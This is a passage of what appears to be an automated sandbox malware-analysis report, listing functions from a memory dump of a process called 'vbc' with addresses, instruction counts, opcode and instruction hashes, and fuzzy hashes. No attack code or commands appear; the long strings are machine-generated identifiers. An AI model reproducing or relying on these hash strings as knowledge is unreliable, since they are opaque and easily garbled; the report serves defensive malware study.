                                                                                                                                                  • Opcode Fuzzy Hash: 25d10230da21cb86749f75200b57267fd413a4f6a69581e9e3a4d4380be760c9
                                                                                                                                                  • Instruction Fuzzy Hash: 2FA1E470B01615DFEB24EF65C898BBAB7B6FF44318F044829EA05A7381EB74E905DB50
                                                                                                                                                  Function 05D14500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 623740886f58256a3f2acf3b8705029337e16e147d8417b025b7a659c5bfa404
                                                                                                                                                  • Instruction ID: 89ca4b51956c1d4a343fce56e60827cdea1650517072ad55946df9f410e597b1
                                                                                                                                                  • Opcode Fuzzy Hash: 623740886f58256a3f2acf3b8705029337e16e147d8417b025b7a659c5bfa404
                                                                                                                                                  • Instruction Fuzzy Hash: 15A1FD72A04241EFCB11DF58D980F6AB7EAFF48754F44092AF9899B250C734EC41CB99
                                                                                                                                                  Function 05CC60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ce51e2db361e7819f7687a40b1f05d726682a89552f83086631c8fb39f79281b
                                                                                                                                                  • Instruction ID: 4300e919df5b5b9938b99486d48bbe8c0813656bded9ff94184081952daa9a29
                                                                                                                                                  • Opcode Fuzzy Hash: ce51e2db361e7819f7687a40b1f05d726682a89552f83086631c8fb39f79281b
                                                                                                                                                  • Instruction Fuzzy Hash: 1D91C171E04215AFCF15CFACD984BAEBFB5AF48710F1549ADE501AB341D734EA809BA0
                                                                                                                                                  Function 05C5E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d6b2e843ff9acdfb266393f39d9ebe64159260dd02a6dbf97d6a9af24403c4bf
                                                                                                                                                  • Instruction ID: 9222e01c493b6cbc08bbab162f9681a7703ac9c3dcfc1f2e19d3d8b97b91f455
                                                                                                                                                  • Opcode Fuzzy Hash: d6b2e843ff9acdfb266393f39d9ebe64159260dd02a6dbf97d6a9af24403c4bf
                                                                                                                                                  • Instruction Fuzzy Hash: 56914532B00616DBD725DBA9C485B7E7BA6FF84724F0448A6EC069B340E734DB81C7A5
                                                                                                                                                  Function 05C36D10 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2e8577d998afdc3b97acb41de1022001c30d29e54a9f64d9b4b87f0b09bf6145
                                                                                                                                                  • Instruction ID: bdcdcc9b101983792e2714be4cf3f8f5e16907a187b6ab0ddd37946eba1925f1
                                                                                                                                                  • Opcode Fuzzy Hash: 2e8577d998afdc3b97acb41de1022001c30d29e54a9f64d9b4b87f0b09bf6145
                                                                                                                                                  • Instruction Fuzzy Hash: B27190766083429BDF28CF15C988A7AB7E9FB84650F044D2DF956D7200E734EA84CBD2
                                                                                                                                                  Function 05C7E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 03e1d488c85371f6383d1cde48412a3e4d340f1d10539440d5159e472bd3c623
                                                                                                                                                  • Instruction ID: 39f99ce2aa0d094fe56ac90922814544b6cec5f5404d06ca9edf5c8c92638ee5
                                                                                                                                                  • Opcode Fuzzy Hash: 03e1d488c85371f6383d1cde48412a3e4d340f1d10539440d5159e472bd3c623
                                                                                                                                                  • Instruction Fuzzy Hash: A0818E71A00609AFDB25DFA9C884EEEBBFAFF48354F104829E556A7210D770AD45CB60
                                                                                                                                                  Function 05C5C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 293e87b634e7bbaa798bf3e0a6e0f0d7172a8c4311d2974ac6db1eeea2694552
                                                                                                                                                  • Instruction ID: 7b653e19c20ac22a862e5136f3cc25515dfef5d8bcd65b337feac0a6b3c066b1
                                                                                                                                                  • Opcode Fuzzy Hash: 293e87b634e7bbaa798bf3e0a6e0f0d7172a8c4311d2974ac6db1eeea2694552
                                                                                                                                                  • Instruction Fuzzy Hash: 6B71C175D04266DBCB25CF99D890BBEBFB1FF48714F14491AE842AB350E7389940CBA4
                                                                                                                                                  Function 05CD8D6B Relevance: .2, Instructions: 206COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 17da5f8792328d7d57af04f384ea52eb8e6e53061e250d2d031364d799eec936
                                                                                                                                                  • Instruction ID: cc312e73f70dcf335f741f230bd74f7a467757a5faa93d265e1ce2787cd95c6d
                                                                                                                                                  • Opcode Fuzzy Hash: 17da5f8792328d7d57af04f384ea52eb8e6e53061e250d2d031364d799eec936
                                                                                                                                                  • Instruction Fuzzy Hash: A271E274A041669FCB10DF59C840ABEFBF2FF45304F048869E994DB241E338DA45CBA0
                                                                                                                                                  Function 05CF47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b7aed7de0ddf690f334c873faed859a20a76461661e50268c93d81d37b12e165
                                                                                                                                                  • Instruction ID: d9dc5aa161d69d502f93501a8f8999fff7e9b1c0e2193bb81390fd6f304fe0d1
                                                                                                                                                  • Opcode Fuzzy Hash: b7aed7de0ddf690f334c873faed859a20a76461661e50268c93d81d37b12e165
                                                                                                                                                  • Instruction Fuzzy Hash: D8719E70A18214EFCF54DF99E985AABBBF9FF80310B10495BE601AB354DB71CA40DB64
                                                                                                                                                  Function 05C5260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4fce631d2448057d63182a1dff7604439dd8670174796cb42fcaa528e5083f30
                                                                                                                                                  • Instruction ID: b99a026ad52133e82f8a7bbec7a9d8c16ba7f9cef030bbecdec454ea180c7383
                                                                                                                                                  • Opcode Fuzzy Hash: 4fce631d2448057d63182a1dff7604439dd8670174796cb42fcaa528e5083f30
                                                                                                                                                  • Instruction Fuzzy Hash: E671E43A7046418FC311DF68C484B2AB7E6FF84324F0589A9EC95CB351DB34D986CB95
                                                                                                                                                  Function 05CC035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                  • Instruction ID: b4163322cfcebbddd50e5c14c53ac4dae0e2446fdeed0739178e1543dbacc442
                                                                                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                  • Instruction Fuzzy Hash: 25717E71A00609EFCB10DFA9C988EEEBBB9FF48710F144969E905B7250DB34EA41DB54
                                                                                                                                                  Function 05CD62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6efa706cf82cd831cbac272fb73053358151ff205cd174deaa301e86a5480e48
                                                                                                                                                  • Instruction ID: 886de4cd50a75b04bbfb12eaa51a0abb051e14239d7d0581a2a01dce5f3c58ca
                                                                                                                                                  • Opcode Fuzzy Hash: 6efa706cf82cd831cbac272fb73053358151ff205cd174deaa301e86a5480e48
                                                                                                                                                  • Instruction Fuzzy Hash: B771DF32200A01AFD722DF58C848F6AF7E6FB40764F154D28E656CB2A0DB75E984DB60
                                                                                                                                                  Function 05C7CDB1 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 34f1e2910970af77df1431a87adde8f079655efabedeb3dc218b9d25a3d12f1c
                                                                                                                                                  • Instruction ID: 54cafa2496f60036000603a968f49c4174ed7c0027c9a125c2fcc5b73cd8d78d
                                                                                                                                                  • Opcode Fuzzy Hash: 34f1e2910970af77df1431a87adde8f079655efabedeb3dc218b9d25a3d12f1c
                                                                                                                                                  • Instruction Fuzzy Hash: 586191B1A0020ADFDB18DFA8C895ABEB7B6FF08314F144969E512EB290DB709D41CF54
                                                                                                                                                  Function 05C3CF50 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                                                                                  • Instruction ID: 06bb0afa9196332b621e54439f4c9718b9d3ed3634854180fc176af6cb652186
                                                                                                                                                  • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                                                                                  • Instruction Fuzzy Hash: A8719975644B868BDB368E25CA49B36BBF2BF44BA1F500F2DD8D3029E0D330A941CB40
                                                                                                                                                  Function 05CFA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 23aebf087a2c6c7634f14431446eba4f26b1602c7f5b42f192f2b89b58036006
                                                                                                                                                  • Instruction ID: 374d789719ffb321ca8268805c17b8dc65b9672d95b3a4b9c8fdb09bc8e590fc
                                                                                                                                                  • Opcode Fuzzy Hash: 23aebf087a2c6c7634f14431446eba4f26b1602c7f5b42f192f2b89b58036006
                                                                                                                                                  • Instruction Fuzzy Hash: 8B51A172608712AFD752DE68CC88E6BFBE9EB85754F010D29BA44DB250D730ED04C7A2
                                                                                                                                                  Function 05C6EDD3 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 41ee912295070ada9d70c0df7b06333e312ef4835315b8d1da2756474bab03f8
                                                                                                                                                  • Instruction ID: 2ba8db29267aacaec194e4981cb3ca204e7200b12d2c658acd471876160410b4
                                                                                                                                                  • Opcode Fuzzy Hash: 41ee912295070ada9d70c0df7b06333e312ef4835315b8d1da2756474bab03f8
                                                                                                                                                  • Instruction Fuzzy Hash: 7E519E797007459FDB20DB9AC8C8B6BB7EAFB45219F100D2EE00287651D774EA84CB91
                                                                                                                                                  Function 05C6CDF0 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                                                                                  • Instruction ID: dadf2a15d587305ef928746fb4798fa94ac9a8207fe636c14e8606d1e51c82f6
                                                                                                                                                  • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                                                                                  • Instruction Fuzzy Hash: 5A519176E0060ADFDB14CF98C5C06EDBBBAFB48208F148969D856B7200D734AE40CB94
                                                                                                                                                  Function 05D08DAE Relevance: .2, Instructions: 162COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1eccec376d246d26bf29643688c354fd914acbdbc30e287f4d5729f5bd4a38b8
                                                                                                                                                  • Instruction ID: 69eef35722ebdd1313f7dd18f4da462bc42e7e3b4fe529842c01c6a8993360a8
                                                                                                                                                  • Opcode Fuzzy Hash: 1eccec376d246d26bf29643688c354fd914acbdbc30e287f4d5729f5bd4a38b8
                                                                                                                                                  • Instruction Fuzzy Hash: 3751D2716083029FD711DF28C844BAABBE6FF84350F04492EF986972D1D734E908DB96
                                                                                                                                                  Function 05CE8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bee8e1f6c8e9a68ccaffa00b8ffaf9d3cf53801391853248658ed28f20874a94
                                                                                                                                                  • Instruction ID: b41e5a0535675e6540bbcf5b1f2e3b6b7c6ad5c0c28ec13ababb92c5b8ea49fd
                                                                                                                                                  • Opcode Fuzzy Hash: bee8e1f6c8e9a68ccaffa00b8ffaf9d3cf53801391853248658ed28f20874a94
                                                                                                                                                  • Instruction Fuzzy Hash: 5F51BF70A00704DFD721DF66C884A6BFBF9FF84710F104A1ED192576A0D7B0A985CB50
                                                                                                                                                  Function 05C7E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ad3afe672c25ba47f3584f08768086b880314b4e26489d2e0b2e13dc737ed5e0
                                                                                                                                                  • Instruction ID: 428e7e89c6e6d6c6b5c96a39f9a3fc010697c62a5f806be79b824c3ac5d0ca05
                                                                                                                                                  • Opcode Fuzzy Hash: ad3afe672c25ba47f3584f08768086b880314b4e26489d2e0b2e13dc737ed5e0
                                                                                                                                                  • Instruction Fuzzy Hash: BD516E72600A48DFDB21EFA5C988EAAB3FDFF04794F500D6AE54297660D734EA40DB50
                                                                                                                                                  Function 05C645B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                  • Instruction ID: 988c263df74a8b2100bd003d86828c0097019023a51c0c7f9ff38849e30d045f
                                                                                                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                  • Instruction Fuzzy Hash: 8F519B71E0461AABCF1ADF94C4C4BEEBBB9AF45354F14446AE901AB240D734DE44CBA1
                                                                                                                                                  Function 05CE4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4c51ff380b117684fd422a586b24ce8c5f3297f7a6bd2ecd7a7d75732c64dd51
                                                                                                                                                  • Instruction ID: 0657f4abab1f7df781ecb4d8fd53ee3279db9ac53915acc2c309446e64269696
                                                                                                                                                  • Opcode Fuzzy Hash: 4c51ff380b117684fd422a586b24ce8c5f3297f7a6bd2ecd7a7d75732c64dd51
                                                                                                                                                  • Instruction Fuzzy Hash: F75136716083419FCB58DF29C881A6BB7E6BFC8618F444E2EF495C7250EB30DA05CB56
                                                                                                                                                  Function 05C3EFD8 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4dc9b024d64ed519c70cf2afc7c743cd47fa25b933d84184e60926ee3c9b7408
                                                                                                                                                  • Instruction ID: 8df162095c6dde2a8aafc7598a16a19a7ed2570bee7c19ea6a343ab0556687a4
                                                                                                                                                  • Opcode Fuzzy Hash: 4dc9b024d64ed519c70cf2afc7c743cd47fa25b933d84184e60926ee3c9b7408
                                                                                                                                                  • Instruction Fuzzy Hash: 4A518D71A08345AFC700DF29D889A6BB7E9FF88254F144C6EF895C7291D734D905CB92
                                                                                                                                                  Function 05C3AE90 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 25e229cc6dedc6696e46cda5420205be3540dc32ff0a1b19df06e2b190888cda
                                                                                                                                                  • Instruction ID: 12046c7aa33570dc124e8235175298bc08b526f8d3a2bb358b690e0bc46d5940
                                                                                                                                                  • Opcode Fuzzy Hash: 25e229cc6dedc6696e46cda5420205be3540dc32ff0a1b19df06e2b190888cda
                                                                                                                                                  • Instruction Fuzzy Hash: 6951F475A08649AFCF19DF68C88AB7DBBB2FB48714F140D2AE842A3280D334DD50C795
                                                                                                                                                  Function 05C7CC00 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 587df90024d84035b02dee61ba3459ecf6fb593167b122780c72badd308a8420
                                                                                                                                                  • Instruction ID: 8204c92de0ead752838ccbad4cf426f2415512bd7bec8cf94f2503585618f5d4
                                                                                                                                                  • Opcode Fuzzy Hash: 587df90024d84035b02dee61ba3459ecf6fb593167b122780c72badd308a8420
                                                                                                                                                  • Instruction Fuzzy Hash: A251F43060420FDBEF24CE29C584B7677AAFB42255F188D2EE807CAA50D771CE91DB52
                                                                                                                                                  Function 05C701F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 13c96b297fc490ef313c90e01b9e3c6952fb4b6ec5d0028fd3dc8440fece5e87
                                                                                                                                                  • Instruction ID: d3eb3f86409714be430cd07538f87f30b64d6c19f7bfcfbccd575536a87f775c
                                                                                                                                                  • Opcode Fuzzy Hash: 13c96b297fc490ef313c90e01b9e3c6952fb4b6ec5d0028fd3dc8440fece5e87
                                                                                                                                                  • Instruction Fuzzy Hash: E241DF36A04218DBCB14DFA8C448AEEF7B5FF48710F14896AE816F7A50D734AD41CBA4
                                                                                                                                                  Function 05C82750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                  • Instruction ID: 3f4434c9133fe9a5962b6d18cfd866c1295a50507a75c4479b8b235f6853e4ed
                                                                                                                                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                  • Instruction Fuzzy Hash: 3E517C75A00219DFDB14CF99C980AADF7B2FF84710F2485A9D855A7350D770EE41CB90
                                                                                                                                                  Function 05C46154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a0cecdcc476482deb1704f45119489220928943c7c5790f62bcb48f86943c7e3
                                                                                                                                                  • Instruction ID: 373cc2580331f2a44af302ad213a3611f69a01f96e065b497101fb4343bf2916
                                                                                                                                                  • Opcode Fuzzy Hash: a0cecdcc476482deb1704f45119489220928943c7c5790f62bcb48f86943c7e3
                                                                                                                                                  • Instruction Fuzzy Hash: 2F510571A04106ABDB35CB68CC09FB8BBB2FF06318F144AA5D516A72C0DB349AC1DF81
                                                                                                                                                  Function 05C40D59 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                  Download Yara Rule
